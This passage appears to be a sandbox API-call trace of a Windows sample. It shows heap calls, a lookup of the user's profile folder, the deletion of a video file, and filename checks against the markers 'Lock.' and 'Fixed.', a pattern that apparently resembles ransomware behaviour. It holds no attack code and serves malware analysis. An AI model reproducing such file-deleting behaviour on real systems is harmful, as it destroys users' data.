RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0258.340] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0258.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0258.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.341] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0258.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0258.342] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/eJwCkaX.avi", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eJwCkaX.avi", lpFilePart=0x8bedfc*="eJwCkaX.avi") returned 0x30 [0258.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0258.343] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eJwCkaX.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ejwckax.avi")) returned 0x20 [0258.343] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eJwCkaX.avi", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bc3c900, ftCreationTime.dwHighDateTime=0x1d4c659, ftLastAccessTime.dwLowDateTime=0xba2bc700, ftLastAccessTime.dwHighDateTime=0x1d4d15a, ftLastWriteTime.dwLowDateTime=0xba2bc700, ftLastWriteTime.dwHighDateTime=0x1d4d15a, nFileSizeHigh=0x0, nFileSizeLow=0x13bd9, dwReserved0=0x187c, dwReserved1=0x4, cFileName="eJwCkaX.avi", cAlternateFileName="")) returned 0xaa5760 [0258.343] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eJwCkaX.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ejwckax.avi")) returned 1 [0258.344] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bc3c900, ftCreationTime.dwHighDateTime=0x1d4c659, ftLastAccessTime.dwLowDateTime=0xba2bc700, ftLastAccessTime.dwHighDateTime=0x1d4d15a, ftLastWriteTime.dwLowDateTime=0xba2bc700, ftLastWriteTime.dwHighDateTime=0x1d4d15a, nFileSizeHigh=0x0, nFileSizeLow=0x13bd9, dwReserved0=0x187c, dwReserved1=0x4, cFileName="eJwCkaX.avi", cAlternateFileName="")) returned 0 [0258.344] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0258.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.345] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0258.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0258.345] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0258.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa898 [0258.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.346] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0258.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0258.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0258.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0258.348] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/eJwCkaX.avi", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eJwCkaX.avi", lpFilePart=0x8bf658*="eJwCkaX.avi") returned 0x30 [0258.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0258.348] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eJwCkaX.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ejwckax.avi")) returned 0xffffffff [0258.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.349] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0258.349] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.349] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0258.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0258.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EseSTJL.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="seSTJL.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSTJL.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STJL.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TJL.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JL.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.350] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0258.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EseSTJL.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="seSTJL.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSTJL.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STJL.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TJL.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JL.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.351] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0258.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0258.351] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0258.351] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0258.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.351] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0258.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0258.351] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.352] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0258.352] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.352] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.353] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.353] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.353] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.353] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/EseSTJL.avi", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67138a0, ftCreationTime.dwHighDateTime=0x1d4d171, ftLastAccessTime.dwLowDateTime=0x30a77050, ftLastAccessTime.dwHighDateTime=0x1d4d19c, ftLastWriteTime.dwLowDateTime=0x30a77050, ftLastWriteTime.dwHighDateTime=0x1d4d19c, nFileSizeHigh=0x0, nFileSizeLow=0x7f8f, dwReserved0=0x740530, dwReserved1=0x11591, cFileName="EseSTJL.avi", cAlternateFileName="")) returned 0xaa5760 [0258.353] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0258.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.354] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.354] 